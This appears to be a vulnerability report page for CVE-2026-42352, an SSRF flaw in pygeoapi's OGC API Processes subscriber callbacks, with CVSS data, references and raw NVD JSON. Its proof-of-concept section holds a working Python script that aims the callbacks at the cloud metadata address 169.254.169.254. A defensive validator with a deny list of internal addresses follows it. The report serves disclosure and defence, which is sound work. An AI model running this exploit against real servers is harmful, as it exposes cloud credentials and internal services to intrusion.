Security Vulnerability Report
CVE-2026-42352 CVSS 8.6 HIGH

CVE-2026-42352

Published: 2026-05-08 23:16:38
Last Modified: 2026-05-08 23:16:38

Description

pygeoapi is a Python server implementation of the OGC API suite of standards. From version 0.23.0 to before version 0.23.3, an OGC API - Processes execution request can use the subscriber object to make the server send HTTP requests to internal services (server-side request forgery, CWE-918). This issue has been patched in version 0.23.3.

CVSS Details

CVSS Score
8.6
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

Configurations (Affected Products)

No CPE configuration data is attached to this record yet (status: Received). Affected version range:

pygeoapi >= 0.23.0, < 0.23.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Base URL of the vulnerable pygeoapi instance (placeholder)
base_url = "http://vulnerable-host.com"

# OGC API - Processes executes a process at /processes/{processId}/execution.
# "hello-world" is the example process shipped in pygeoapi's default
# configuration; substitute any process the target exposes.
process_id = "hello-world"
target_url = f"{base_url}/processes/{process_id}/execution"

# The subscriber object (OGC API - Processes Part 1) carries callback URLs
# that the server itself requests when the job changes state. Pointing them
# at an internal address turns the callback into an SSRF request.
# Example: the cloud instance metadata service (AWS/Azure/GCP).
internal_url = "http://169.254.169.254/latest/meta-data/"
payload = {
    "inputs": {"name": "test"},
    "subscriber": {
        "successUri": internal_url,
        "inProgressUri": internal_url,
        "failedUri": internal_url,
    },
    "mode": "async",
}

try:
    # pygeoapi accepts "mode": "async" in the body; the standard way to ask
    # for asynchronous execution is the Prefer header, so send both.
    response = requests.post(
        target_url,
        json=payload,
        headers={"Prefer": "respond-async"},
        timeout=10,
    )
    if response.status_code in (200, 201):
        # The callback is made by the server, not returned to the client:
        # confirm it fires against a listener you control before probing
        # internal targets.
        print("[+] Execution request accepted; server will issue the callback.")
        print(f"[+] Response: {response.text}")
    else:
        print(f"[-] Failed to send request. Status: {response.status_code}")
        print(f"[-] Response: {response.text}")
except requests.RequestException as e:
    print(f"[!] Error occurred: {e}")
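The check that closes this class of bug is a validation of every callback URI in the subscriber object before the server dereferences any of them. The block below is an added illustration of that check written for this page; it is not pygeoapi's own fix (the referenced commit contains that). `validate_subscriber`, `classify`, `DEMO_DNS` and the host names it maps are hypothetical, and the DNS table is constructed so the example runs offline. It resolves host names instead of string-matching them, rejects non-HTTP(S) schemes, embedded credentials and unknown fields, and refuses any address that is loopback, link-local, private, multicast or otherwise non-global, which covers the instance-metadata address used in the PoC above as well as a name that publishes one public and one loopback record.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Hypothetical validator for the OGC API - Processes "subscriber" object
# (successUri / inProgressUri / failedUri). It illustrates the CWE-918 check
# a server must apply before issuing callback requests; not pygeoapi's fix.
SUBSCRIBER_FIELDS = ("successUri", "inProgressUri", "failedUri")
ALLOWED_SCHEMES = {"http", "https"}

# Explicit deny list on top of the generic "non-global address" rule.
# 169.254.169.254 is the cloud instance-metadata service used in the PoC.
BLOCKED_NETWORKS = [
    ipaddress.ip_network("169.254.169.254/32"),
    ipaddress.ip_network("fd00:ec2::254/128"),  # AWS IMDS over IPv6
]

class SubscriberRejected(ValueError):
    """Raised when a callback URI must not be dereferenced."""

def default_resolve(host):
    """Every address the name maps to, via the system resolver."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})

def _is_ip_literal(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False

def _is_internal(addr):
    ip = ipaddress.ip_address(addr)
    if ip.version == 6 and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped  # ::ffff:10.0.0.5 is really 10.0.0.5
    if any(ip in net for net in BLOCKED_NETWORKS):
        return True
    # is_global is False for loopback, link-local, RFC 1918, shared address
    # space, reserved and unspecified addresses; multicast is checked apart.
    return ip.is_multicast or not ip.is_global

def validate_subscriber(subscriber, resolve=default_resolve):
    """Return {field: url} for an acceptable subscriber object, else raise."""
    if not isinstance(subscriber, dict):
        raise SubscriberRejected("subscriber must be a JSON object")
    unknown = set(subscriber) - set(SUBSCRIBER_FIELDS)
    if unknown:
        raise SubscriberRejected(f"unknown subscriber fields: {sorted(unknown)}")
    checked = {}
    for field, url in subscriber.items():
        if not isinstance(url, str):
            raise SubscriberRejected(f"{field}: must be a string")
        parts = urlsplit(url)
        if parts.scheme.lower() not in ALLOWED_SCHEMES:
            raise SubscriberRejected(f"{field}: scheme {parts.scheme!r} not allowed")
        host = parts.hostname
        if not host or parts.username is not None or parts.password is not None:
            raise SubscriberRejected(f"{field}: missing host or embedded credentials")
        # Never string-match the host: resolve it and judge the addresses.
        # A decimal form such as http://2130706433/ is not an IP literal to
        # ipaddress, yet the system resolver turns it into 127.0.0.1.
        try:
            addrs = [host] if _is_ip_literal(host) else resolve(host)
        except socket.gaierror as exc:
            raise SubscriberRejected(f"{field}: cannot resolve {host}: {exc}")
        for addr in addrs:
            if _is_internal(addr):
                raise SubscriberRejected(f"{field}: {host} resolves to internal {addr}")
        checked[field] = url
    return checked

# Constructed DNS table so the demonstration runs offline; hosts are hypothetical.
DEMO_DNS = {
    "callbacks.example": ["93.184.216.34"],
    "jobs.internal.corp": ["10.0.0.5"],
    "rebind.example": ["93.184.216.34", "127.0.0.1"],  # public + loopback record
}

def demo_resolve(host):
    if host not in DEMO_DNS:
        raise socket.gaierror(f"no such host: {host}")
    return DEMO_DNS[host]

def classify(subscriber, resolve=demo_resolve):
    """'accepted' or 'rejected: <reason>' for a candidate subscriber object."""
    try:
        validate_subscriber(subscriber, resolve)
        return "accepted"
    except SubscriberRejected as exc:
        return f"rejected: {exc}"

if __name__ == "__main__":
    for candidate in [
        {"successUri": "https://callbacks.example/done"},
        {"successUri": "http://169.254.169.254/latest/meta-data/"},
        {"failedUri": "http://jobs.internal.corp/hook"},
        {"successUri": "http://rebind.example/x"},
        {"successUri": "http://2130706433/"},
    ]:
        print(f"{classify(candidate):60} <- {candidate}")
```

Two caveats apply to any validator of this shape. The addresses are checked here, but the HTTP client that later performs the callback resolves the name again, so a name whose answer changes between the two lookups (DNS rebinding) slips through; a production implementation connects to the validated address and sets the Host header itself, or repeats the check inside the client's connection hook. The callback client must also not follow redirects, or must re-run the check on every hop, since a public host can 302 to an internal one.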

References

https://github.com/geopython/pygeoapi/security/advisories/GHSA-jgvc-94c8-3chc
https://github.com/geopython/pygeoapi/commit/3a63f5b0cc6275e3ae0edb47726b13a43cdd90ef
https://github.com/geopython/pygeoapi/releases/tag/0.23.3

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-42352", "sourceIdentifier": "[email protected]", "published": "2026-05-08T23:16:38.317", "lastModified": "2026-05-08T23:16:38.317", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "pygeoapi is a Python server implementation of the OGC API suite of standards. From version 0.23.0 to before version 0.23.3, OGC API process execution requests can use the subscriber object to requests to internal HTTP services. This issue has been patched in version 0.23.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-918"}]}], "references": [{"url": "https://github.com/geopython/pygeoapi/commit/3a63f5b0cc6275e3ae0edb47726b13a43cdd90ef", "source": "[email protected]"}, {"url": "https://github.com/geopython/pygeoapi/releases/tag/0.23.3", "source": "[email protected]"}, {"url": "https://github.com/geopython/pygeoapi/security/advisories/GHSA-jgvc-94c8-3chc", "source": "[email protected]"}]}}